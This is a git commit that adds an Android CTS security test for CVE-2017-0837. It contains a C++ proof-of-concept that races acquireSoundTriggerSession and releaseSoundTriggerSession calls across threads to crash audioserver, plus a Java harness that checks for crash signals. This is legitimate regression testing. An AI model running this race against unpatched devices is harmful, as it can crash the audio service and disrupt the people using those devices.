[RESTRICT AUTOMERGE] CTS test for Android Security b/64340921

Bug: 64340921
Bug: 72396833
Test: Ran the new testcase on android-8.0.0_r30 with/without patch

Change-Id: Iab20abe6671bd12a8430e2b0cbe7484363121f29
Merged-In: Iab20abe6671bd12a8430e2b0cbe7484363121f29
(cherry picked from commit bba8de14af6a0cf0e792ab712ecd9d58f7bdce31)
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index 80c64dc..ed09f45 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -189,6 +189,7 @@
         <!--__________________-->
         <!-- Bulletin 2018-02 -->
         <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+        <option name="push" value="CVE-2017-0837->/data/local/tmp/CVE-2017-0837" />
         <option name="push" value="CVE-2017-13273->/data/local/tmp/CVE-2017-13273" />
         <option name="push" value="CVE-2017-13232->/data/local/tmp/CVE-2017-13232" />
         <option name="push" value="CVE-2017-17767->/data/local/tmp/CVE-2017-17767" />
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0837/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0837/Android.mk
new file mode 100644
index 0000000..583cd6f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0837/Android.mk
@@ -0,0 +1,33 @@
+# Copyright (C) 2020 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := CVE-2017-0837
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+LOCAL_SHARED_LIBRARIES := libutils
+LOCAL_SHARED_LIBRARIES += libbinder
+LOCAL_SHARED_LIBRARIES += libaudioclient
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS := -Wall -Werror
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0837/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0837/poc.cpp
new file mode 100644
index 0000000..725ba36
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0837/poc.cpp
@@ -0,0 +1,117 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/IServiceManager.h>
+#include <binder/IPCThreadState.h>
+#include <media/IAudioPolicyService.h>
+#include "../includes/common.h"
+
+using namespace android;
+
+#define MAX_NUMBER_OF_AUDIO_SESSIONS 1024
+#define MAX_NUMBER_OF_THREADS 5
+#define MAX_NUMBER_OF_ACQUIRE_SESSION_THREADS 2
+#define SLEEP_TIME_IN_SECONDS 5
+
+struct pocAudioSessionCtxt {
+    sp<IAudioPolicyService> audioService;
+    audio_session_t audioSession[MAX_NUMBER_OF_AUDIO_SESSIONS];
+    volatile bool startThread;
+};
+
+static void* acquireSoundTriggerSessionThread(void *arg) {
+    int i = 0;
+    pocAudioSessionCtxt *ctxt = (pocAudioSessionCtxt *) arg;
+    if (!ctxt) {
+        return nullptr;
+    }
+    time_t currentTime = start_timer();
+    while (timer_active(currentTime)) {
+        if (ctxt->startThread == true && ctxt->audioService != nullptr) {
+            audio_io_handle_t ioHandle = 0;
+            audio_devices_t device = 0;
+            ctxt->audioService->acquireSoundTriggerSession(
+                    &(ctxt->audioSession[++i]), &ioHandle, &device);
+            if (i >= MAX_NUMBER_OF_AUDIO_SESSIONS) {
+                i = 0;
+            }
+        }
+    }
+    return nullptr;
+}
+
+static void* releaseSoundTriggerSessionThread(void *arg) {
+    int i = 0;
+    pocAudioSessionCtxt *ctxt = (pocAudioSessionCtxt *) arg;
+    if (!ctxt) {
+        return nullptr;
+    }
+    time_t currentTime = start_timer();
+    while (timer_active(currentTime)) {
+        if (ctxt->startThread == true && ctxt->audioService != nullptr) {
+            ctxt->audioService->releaseSoundTriggerSession(
+                    ctxt->audioSession[++i]);
+            if (i >= MAX_NUMBER_OF_AUDIO_SESSIONS) {
+                i = 0;
+            }
+        }
+    }
+    return nullptr;
+}
+
+class MyDeathRecipient : public IBinder::DeathRecipient {
+ public:
+    MyDeathRecipient() {
+    }
+    virtual void binderDied(const wp<IBinder>& who __unused) {
+        exit(EXIT_SUCCESS);
+    }
+};
+
+int main() {
+    pocAudioSessionCtxt ctxt;
+    pthread_t thread[MAX_NUMBER_OF_THREADS];
+    ctxt.startThread = false;
+
+    for (int i = 0; i < MAX_NUMBER_OF_ACQUIRE_SESSION_THREADS; ++i) {
+        pthread_create(&thread[i], nullptr, acquireSoundTriggerSessionThread,
+                       &ctxt);
+    }
+
+    for (int i = MAX_NUMBER_OF_ACQUIRE_SESSION_THREADS;
+            i < MAX_NUMBER_OF_THREADS; ++i) {
+        pthread_create(&thread[i], nullptr, releaseSoundTriggerSessionThread,
+                       &ctxt);
+    }
+
+    sp < IServiceManager > sm = defaultServiceManager();
+    sp < IBinder > binder = sm->getService(String16("media.audio_policy"));
+    if (binder == nullptr) {
+        return EXIT_FAILURE;
+    }
+    ctxt.audioService = interface_cast < IAudioPolicyService > (binder);
+    if (ctxt.audioService == nullptr) {
+        return EXIT_FAILURE;
+    }
+
+    sp<MyDeathRecipient> deathRecipient = new MyDeathRecipient();
+    binder->linkToDeath(deathRecipient);
+    ctxt.startThread = true;
+    for (int i = 0; i < MAX_NUMBER_OF_THREADS; ++i) {
+        pthread_join(thread[i], nullptr);
+    }
+    return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
index 62ec1d3..9bf339a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
@@ -54,6 +54,20 @@
      ******************************************************************************/
 
     /**
+     * b/64340921
+     * Vulnerability Behaviour: SIGABRT in audioserver
+     */
+    @Test
+    @SecurityTest(minPatchLevel = "2018-02")
+    public void testPocCVE_2017_0837() throws Exception {
+        String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
+        AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig("CVE-2017-0837", getDevice());
+        testConfig.config = new CrashUtils.Config().setProcessPatterns("audioserver");
+        testConfig.config.setSignals(signals);
+        AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+    }
+
+    /**
      * b/62151041 - Has 4 CVEs filed together
      */
     /** 1. CVE-2017-9047